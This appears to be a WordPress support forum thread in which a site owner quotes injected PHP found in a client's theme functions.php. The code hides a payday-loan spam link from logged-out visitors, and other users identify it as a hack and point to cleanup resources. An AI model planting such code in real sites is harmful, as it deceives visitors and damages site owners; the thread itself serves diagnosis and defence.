Title: Curious Code Appeard In Function File
Last modified: August 20, 2016

---

# Curious Code Appeard In Function File

 *  [get_username](https://wordpress.org/support/users/get_username/)
 * (@get_username)
 * [13 years, 4 months ago](https://wordpress.org/support/topic/curious-code-appeard-in-function-file/)
 * I have a clients site that recently stopped working correctly with the error “
   Cannot modify header information – headers already sent.” Their host, GoDaddy,
   decided it would be best to revert to the default theme, which in turn removed
   a lot of custom features. GoDaddy said that the theme I created was not compatible
   with the new version of WordPress 3.5. Interestingly enough the site worked fine
   a couple weeks ago after I upgraded. The only plugins I have running are Contact
   Form 7 and Really Simple CAPTCHA.
 * Now, the odd thing is that I ran across a rogue line of code at the top of the
   functions.php file.
    `<?php function callbackx($buffer) {$tx="";if (function_exists("
   is_user_logged_in"))if (!is_user_logged_in()) $tx=" <style>.fait{position:absolute;
   clip:rect(411px,auto,auto,475px);}</style><div class=fait><a href=http://advancedcashin10min.
   com >payday loans</a></div>"; if (stristr($buffer,"</a>"))$buffer=str_ireplace("
   </a>","</a>".$tx,$buffer); else $buffer=$tx.$buffer; return $buffer; } function
   buffer_startx(){ob_start("callbackx");} function buffer_endx(){ob_end_flush();}
   add_action('wp_head', 'buffer_startx'); add_action('wp_footer', 'buffer_endx');?
   >`
 * It looks to me like some sort of virus with that url, and of course the fact 
   that my original file never included this. Before I go in and re-activate the
   theme, I’m wondering how I should go about this. The TwentyEleven theme work 
   fine, but that’s because it’s not using the custom theme’s function file. Should
   I just delete that rogue line of code and active, assuming this is the root of
   the cause? Or can I assume this has affected other parts of the theme? Does this
   sound like a virus, and if so, is it something I could have avoided by programming
   the theme better?
 * Thanks,
    Burt

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [WPyogi](https://wordpress.org/support/users/wpyogi/)
 * (@wpyogi)
 * [13 years, 4 months ago](https://wordpress.org/support/topic/curious-code-appeard-in-function-file/#post-3397801)
 * That’s definitely looks like a hacked file — and in fact, GoDaddy had a bunch
   of hacked sites recently that inserted “payday loan” garbage. Not sure how the
   hacks happened — but you might want to ask them more assertively :).
 * These are the recommended resources for dealing with hacked sites:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
    [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  Thread Starter [get_username](https://wordpress.org/support/users/get_username/)
 * (@get_username)
 * [13 years, 4 months ago](https://wordpress.org/support/topic/curious-code-appeard-in-function-file/#post-3397908)
 * Thanks, WPyogi. These resources are very helpful. I appreciate the reply. The
   site seems to work after removing that rogue code, but I will definitely run 
   a full scan.
 *  [WPyogi](https://wordpress.org/support/users/wpyogi/)
 * (@wpyogi)
 * [13 years, 4 months ago](https://wordpress.org/support/topic/curious-code-appeard-in-function-file/#post-3397910)
 * Yeah, do that – because just removing the errant code doesn’t ensure you’ve dealt
   with any backdoors – though in this case, those may well have been on GD servers.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Curious Code Appeard In Function File’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 2 participants
 * Last reply from: [WPyogi](https://wordpress.org/support/users/wpyogi/)
 * Last activity: [13 years, 4 months ago](https://wordpress.org/support/topic/curious-code-appeard-in-function-file/#post-3397910)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics